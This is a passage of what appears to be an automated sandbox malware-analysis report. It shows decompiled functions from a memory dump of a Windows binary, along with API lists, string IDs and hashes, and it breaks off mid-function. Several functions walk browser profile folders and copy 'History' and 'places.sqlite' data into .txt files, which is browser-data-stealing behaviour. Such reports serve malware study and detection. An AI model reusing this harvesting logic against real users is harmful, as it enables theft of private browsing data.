                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404C15, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
				 *0x41b00c = 2;
				 *0x41c010 = 0x4010b8;
				 *0x41c014 = 0x4010c0;
				 *0x41c036 = 2;
				 *0x41c000 = E00404568;
				if(E00402A94() != 0) {
					_t3 = E00402AC4();
				}
				E00402B88(_t3);
				 *0x41c03c = 0xd7b0;
				 *0x41c208 = 0xd7b0;
				 *0x41c3d4 = 0xd7b0;
				 *0x41c02c = GetCommandLineA();
				 *0x41c028 = E00401180();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x41c5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x41c020 = _t11;
				return _t11;
			}





                                                                                                                                                                                          0x00404c15
                                                                                                                                                                                          0x00404c1a
                                                                                                                                                                                          0x00404c1f
                                                                                                                                                                                          0x00404c21
                                                                                                                                                                                          0x00404c28
                                                                                                                                                                                          0x00404c32
                                                                                                                                                                                          0x00404c3c
                                                                                                                                                                                          0x00404c43
                                                                                                                                                                                          0x00404c54
                                                                                                                                                                                          0x00404c56
                                                                                                                                                                                          0x00404c56
                                                                                                                                                                                          0x00404c5b
                                                                                                                                                                                          0x00404c60
                                                                                                                                                                                          0x00404c69
                                                                                                                                                                                          0x00404c72
                                                                                                                                                                                          0x00404c80
                                                                                                                                                                                          0x00404c8a
                                                                                                                                                                                          0x00404c9e
                                                                                                                                                                                          0x00404cd7
                                                                                                                                                                                          0x00404ca0
                                                                                                                                                                                          0x00404cae
                                                                                                                                                                                          0x00404cc6
                                                                                                                                                                                          0x00404cb0
                                                                                                                                                                                          0x00404cb0
                                                                                                                                                                                          0x00404cb0
                                                                                                                                                                                          0x00404cae
                                                                                                                                                                                          0x00404cdc
                                                                                                                                                                                          0x00404ce1
                                                                                                                                                                                          0x00404ce6

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402A99
                                                                                                                                                                                            • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402AA5
                                                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00404C8F
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00404CA0
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                            • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                                                                                                                                            • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                          • String ID: 3
                                                                                                                                                                                          • API String ID: 3734044017-4259502353
                                                                                                                                                                                          • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                          • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                                                                                                                                          • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                          • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412D70, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                          			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				signed int _t58;
				void* _t112;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_pop(_t114);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_pop(_t147);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_t58 = __eax | 0x00000a00;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *0xd000a00 =  *0xd000a00 + __ecx;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + _t58;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t116 = 0x51;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_push(_t116);
				_t7 =  &_v8;
				 *_t7 = _t116;
				_push(_t114);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t7;
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t114, 0x104) != 0) {
						_push(_t148);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t112);
							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
						}
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t131);
				 *[fs:eax] = _t131;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                                                                                                          0x00412d70
                                                                                                                                                                                          0x00412d70
                                                                                                                                                                                          0x00412d70
                                                                                                                                                                                          0x00412d71
                                                                                                                                                                                          0x00412d73
                                                                                                                                                                                          0x00412d76
                                                                                                                                                                                          0x00412d78
                                                                                                                                                                                          0x00412d79
                                                                                                                                                                                          0x00412d7b
                                                                                                                                                                                          0x00412d7d
                                                                                                                                                                                          0x00412d7f
                                                                                                                                                                                          0x00412d82
                                                                                                                                                                                          0x00412d84
                                                                                                                                                                                          0x00412d89
                                                                                                                                                                                          0x00412d8b
                                                                                                                                                                                          0x00412d8d
                                                                                                                                                                                          0x00412d8f
                                                                                                                                                                                          0x00412d95
                                                                                                                                                                                          0x00412d97
                                                                                                                                                                                          0x00412d99
                                                                                                                                                                                          0x00412d9b
                                                                                                                                                                                          0x00412d9d
                                                                                                                                                                                          0x00412d9f
                                                                                                                                                                                          0x00412da0
                                                                                                                                                                                          0x00412da5
                                                                                                                                                                                          0x00412da5
                                                                                                                                                                                          0x00412da7
                                                                                                                                                                                          0x00412da9
                                                                                                                                                                                          0x00412da9
                                                                                                                                                                                          0x00412dac
                                                                                                                                                                                          0x00412dad
                                                                                                                                                                                          0x00412dad
                                                                                                                                                                                          0x00412db0
                                                                                                                                                                                          0x00412db1
                                                                                                                                                                                          0x00412db2
                                                                                                                                                                                          0x00412db3
                                                                                                                                                                                          0x00412db6
                                                                                                                                                                                          0x00412db9
                                                                                                                                                                                          0x00412dbf
                                                                                                                                                                                          0x00412dc7
                                                                                                                                                                                          0x00412dcf
                                                                                                                                                                                          0x00412dd6
                                                                                                                                                                                          0x00412dd7
                                                                                                                                                                                          0x00412ddc
                                                                                                                                                                                          0x00412ddf
                                                                                                                                                                                          0x00412df7
                                                                                                                                                                                          0x00412e0d
                                                                                                                                                                                          0x00412e10
                                                                                                                                                                                          0x00412e10
                                                                                                                                                                                          0x00412e13
                                                                                                                                                                                          0x00412e29
                                                                                                                                                                                          0x00412e2e
                                                                                                                                                                                          0x00412e34
                                                                                                                                                                                          0x00412e44
                                                                                                                                                                                          0x00412e49
                                                                                                                                                                                          0x00412e5a
                                                                                                                                                                                          0x00412e6c
                                                                                                                                                                                          0x00412e74
                                                                                                                                                                                          0x00412e75
                                                                                                                                                                                          0x00412e7a
                                                                                                                                                                                          0x00412e7d
                                                                                                                                                                                          0x00412e84
                                                                                                                                                                                          0x00412e8a
                                                                                                                                                                                          0x00412e8d
                                                                                                                                                                                          0x00412ea3
                                                                                                                                                                                          0x00412ea8
                                                                                                                                                                                          0x00412eae
                                                                                                                                                                                          0x00412ebe
                                                                                                                                                                                          0x00412ecf
                                                                                                                                                                                          0x00412ee0
                                                                                                                                                                                          0x00412eeb
                                                                                                                                                                                          0x00412eec
                                                                                                                                                                                          0x00412eef
                                                                                                                                                                                          0x00412ef4
                                                                                                                                                                                          0x00412ef7
                                                                                                                                                                                          0x00412f0d
                                                                                                                                                                                          0x00412f12
                                                                                                                                                                                          0x00412f18
                                                                                                                                                                                          0x00412f28
                                                                                                                                                                                          0x00412f39
                                                                                                                                                                                          0x00412f44
                                                                                                                                                                                          0x00412f45
                                                                                                                                                                                          0x00412f45
                                                                                                                                                                                          0x00412f4c
                                                                                                                                                                                          0x00412f4f
                                                                                                                                                                                          0x00412f4f
                                                                                                                                                                                          0x00412f6e
                                                                                                                                                                                          0x00412f7a
                                                                                                                                                                                          0x00412f81
                                                                                                                                                                                          0x00412f84
                                                                                                                                                                                          0x00412f87
                                                                                                                                                                                          0x00412f97
                                                                                                                                                                                          0x00412fa2
                                                                                                                                                                                          0x00412fb2
                                                                                                                                                                                          0x00412fbd
                                                                                                                                                                                          0x00412fcd
                                                                                                                                                                                          0x00412fdf

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\History
                                                                                                                                                                                          • API String ID: 1974802433-2232271174
                                                                                                                                                                                          • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                          • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412D9C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t124;
				intOrPtr _t129;
				intOrPtr _t141;
				intOrPtr _t142;

				_t139 = __esi;
				_t138 = __edi;
				_t107 = __ebx;
				_t141 = _t142;
				_push(__ecx);
				_t109 = 0x51;
				do {
					_push(0);
					_push(0);
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_push(_t109);
				_t1 =  &_v8;
				 *_t1 = _t109;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t141);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t142;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t107, 0x104) != 0) {
						_push(_t141);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t142;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t105);
							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
						}
						_pop(_t129);
						 *[fs:eax] = _t129;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                                                                                                          0x00412d9c
                                                                                                                                                                                          0x00412d9c
                                                                                                                                                                                          0x00412d9c
                                                                                                                                                                                          0x00412d9d
                                                                                                                                                                                          0x00412d9f
                                                                                                                                                                                          0x00412da0
                                                                                                                                                                                          0x00412da5
                                                                                                                                                                                          0x00412da5
                                                                                                                                                                                          0x00412da7
                                                                                                                                                                                          0x00412da9
                                                                                                                                                                                          0x00412da9
                                                                                                                                                                                          0x00412dac
                                                                                                                                                                                          0x00412dad
                                                                                                                                                                                          0x00412dad
                                                                                                                                                                                          0x00412db0
                                                                                                                                                                                          0x00412db1
                                                                                                                                                                                          0x00412db2
                                                                                                                                                                                          0x00412db3
                                                                                                                                                                                          0x00412db6
                                                                                                                                                                                          0x00412db9
                                                                                                                                                                                          0x00412dbf
                                                                                                                                                                                          0x00412dc7
                                                                                                                                                                                          0x00412dcf
                                                                                                                                                                                          0x00412dd6
                                                                                                                                                                                          0x00412dd7
                                                                                                                                                                                          0x00412ddc
                                                                                                                                                                                          0x00412ddf
                                                                                                                                                                                          0x00412df7
                                                                                                                                                                                          0x00412e0d
                                                                                                                                                                                          0x00412e10
                                                                                                                                                                                          0x00412e10
                                                                                                                                                                                          0x00412e13
                                                                                                                                                                                          0x00412e29
                                                                                                                                                                                          0x00412e2e
                                                                                                                                                                                          0x00412e34
                                                                                                                                                                                          0x00412e44
                                                                                                                                                                                          0x00412e49
                                                                                                                                                                                          0x00412e5a
                                                                                                                                                                                          0x00412e6c
                                                                                                                                                                                          0x00412e74
                                                                                                                                                                                          0x00412e75
                                                                                                                                                                                          0x00412e7a
                                                                                                                                                                                          0x00412e7d
                                                                                                                                                                                          0x00412e84
                                                                                                                                                                                          0x00412e8a
                                                                                                                                                                                          0x00412e8d
                                                                                                                                                                                          0x00412ea3
                                                                                                                                                                                          0x00412ea8
                                                                                                                                                                                          0x00412eae
                                                                                                                                                                                          0x00412ebe
                                                                                                                                                                                          0x00412ecf
                                                                                                                                                                                          0x00412ee0
                                                                                                                                                                                          0x00412eeb
                                                                                                                                                                                          0x00412eec
                                                                                                                                                                                          0x00412eef
                                                                                                                                                                                          0x00412ef4
                                                                                                                                                                                          0x00412ef7
                                                                                                                                                                                          0x00412f0d
                                                                                                                                                                                          0x00412f12
                                                                                                                                                                                          0x00412f18
                                                                                                                                                                                          0x00412f28
                                                                                                                                                                                          0x00412f39
                                                                                                                                                                                          0x00412f44
                                                                                                                                                                                          0x00412f45
                                                                                                                                                                                          0x00412f45
                                                                                                                                                                                          0x00412f4c
                                                                                                                                                                                          0x00412f4f
                                                                                                                                                                                          0x00412f4f
                                                                                                                                                                                          0x00412f6e
                                                                                                                                                                                          0x00412f7a
                                                                                                                                                                                          0x00412f81
                                                                                                                                                                                          0x00412f84
                                                                                                                                                                                          0x00412f87
                                                                                                                                                                                          0x00412f97
                                                                                                                                                                                          0x00412fa2
                                                                                                                                                                                          0x00412fb2
                                                                                                                                                                                          0x00412fbd
                                                                                                                                                                                          0x00412fcd
                                                                                                                                                                                          0x00412fdf

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\History
                                                                                                                                                                                          • API String ID: 1974802433-2232271174
                                                                                                                                                                                          • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                          • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041303C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t103;
				intOrPtr _t108;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t141;

				_t138 = __esi;
				_t137 = __edi;
				_t106 = __ebx;
				_t140 = _t141;
				_push(__ecx);
				_t108 = 0x51;
				do {
					_push(0);
					_push(0);
					_t108 = _t108 - 1;
				} while (_t108 != 0);
				_push(_t108);
				_t1 =  &_v8;
				 *_t1 = _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t140);
				_push(0x413276);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x4132a0);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x4132a0);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t106, 0x104) != 0) {
						_push(_t140);
						_push(0x4131ea);
						_push( *[fs:eax]);
						 *[fs:eax] = _t141;
						_push(_v8);
						_push(0x4132a0);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(L"\\places.sqlite");
						E00403E1C();
						E0041256C(_v644, _t106,  &_v640, _t137, _t138);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x4132a0);
						_push(_v12);
						_push(E004132CC);
						E00403D10( &_v660, 0x104,  &(_v616.cFileName));
						_push(_v660);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v652, _v656);
						_pop(_t103);
						E0040DCE8(_t103, _t106, _v652, _t137, _t138);
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t123);
				 *[fs:eax] = _t123;
				_push(E0041327D);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                                                                                                          0x0041303c
                                                                                                                                                                                          0x0041303c
                                                                                                                                                                                          0x0041303c
                                                                                                                                                                                          0x0041303d
                                                                                                                                                                                          0x0041303f
                                                                                                                                                                                          0x00413040
                                                                                                                                                                                          0x00413045
                                                                                                                                                                                          0x00413045
                                                                                                                                                                                          0x00413047
                                                                                                                                                                                          0x00413049
                                                                                                                                                                                          0x00413049
                                                                                                                                                                                          0x0041304c
                                                                                                                                                                                          0x0041304d
                                                                                                                                                                                          0x0041304d
                                                                                                                                                                                          0x00413050
                                                                                                                                                                                          0x00413051
                                                                                                                                                                                          0x00413052
                                                                                                                                                                                          0x00413053
                                                                                                                                                                                          0x00413056
                                                                                                                                                                                          0x00413059
                                                                                                                                                                                          0x0041305f
                                                                                                                                                                                          0x00413067
                                                                                                                                                                                          0x0041306f
                                                                                                                                                                                          0x00413076
                                                                                                                                                                                          0x00413077
                                                                                                                                                                                          0x0041307c
                                                                                                                                                                                          0x0041307f
                                                                                                                                                                                          0x00413097
                                                                                                                                                                                          0x004130ad
                                                                                                                                                                                          0x004130b0
                                                                                                                                                                                          0x004130b0
                                                                                                                                                                                          0x004130b3
                                                                                                                                                                                          0x004130c9
                                                                                                                                                                                          0x004130ce
                                                                                                                                                                                          0x004130d4
                                                                                                                                                                                          0x004130e4
                                                                                                                                                                                          0x004130e9
                                                                                                                                                                                          0x004130fa
                                                                                                                                                                                          0x0041310c
                                                                                                                                                                                          0x00413114
                                                                                                                                                                                          0x00413115
                                                                                                                                                                                          0x0041311a
                                                                                                                                                                                          0x0041311d
                                                                                                                                                                                          0x00413120
                                                                                                                                                                                          0x00413123
                                                                                                                                                                                          0x00413139
                                                                                                                                                                                          0x0041313e
                                                                                                                                                                                          0x00413144
                                                                                                                                                                                          0x00413154
                                                                                                                                                                                          0x00413165
                                                                                                                                                                                          0x00413176
                                                                                                                                                                                          0x00413181
                                                                                                                                                                                          0x00413182
                                                                                                                                                                                          0x00413185
                                                                                                                                                                                          0x0041318a
                                                                                                                                                                                          0x0041318d
                                                                                                                                                                                          0x004131a3
                                                                                                                                                                                          0x004131a8
                                                                                                                                                                                          0x004131ae
                                                                                                                                                                                          0x004131be
                                                                                                                                                                                          0x004131cf
                                                                                                                                                                                          0x004131da
                                                                                                                                                                                          0x004131db
                                                                                                                                                                                          0x004131e2
                                                                                                                                                                                          0x004131e5
                                                                                                                                                                                          0x004131e5
                                                                                                                                                                                          0x00413204
                                                                                                                                                                                          0x00413210
                                                                                                                                                                                          0x00413217
                                                                                                                                                                                          0x0041321a
                                                                                                                                                                                          0x0041321d
                                                                                                                                                                                          0x0041322d
                                                                                                                                                                                          0x00413238
                                                                                                                                                                                          0x00413248
                                                                                                                                                                                          0x00413253
                                                                                                                                                                                          0x00413263
                                                                                                                                                                                          0x00413275

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\places.sqlite
                                                                                                                                                                                          • API String ID: 1974802433-3919338718
                                                                                                                                                                                          • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                          • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004111C4, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                          			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				void* _t143;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t181;
				intOrPtr _t188;
				intOrPtr _t210;
				intOrPtr _t211;

				_t208 = __esi;
				_t207 = __edi;
				_t162 = __ebx;
				_t210 = _t211;
				_push(__ecx);
				_t164 = 0x56;
				do {
					_push(0);
					_push(0);
					_t164 = _t164 - 1;
				} while (_t164 != 0);
				_t1 =  &_v8;
				 *_t1 = _t164;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t210);
				_push(0x411542);
				_push( *[fs:eax]);
				 *[fs:eax] = _t211;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x41156c);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x41156c);
					E0040813C(0x61,  &_v632);
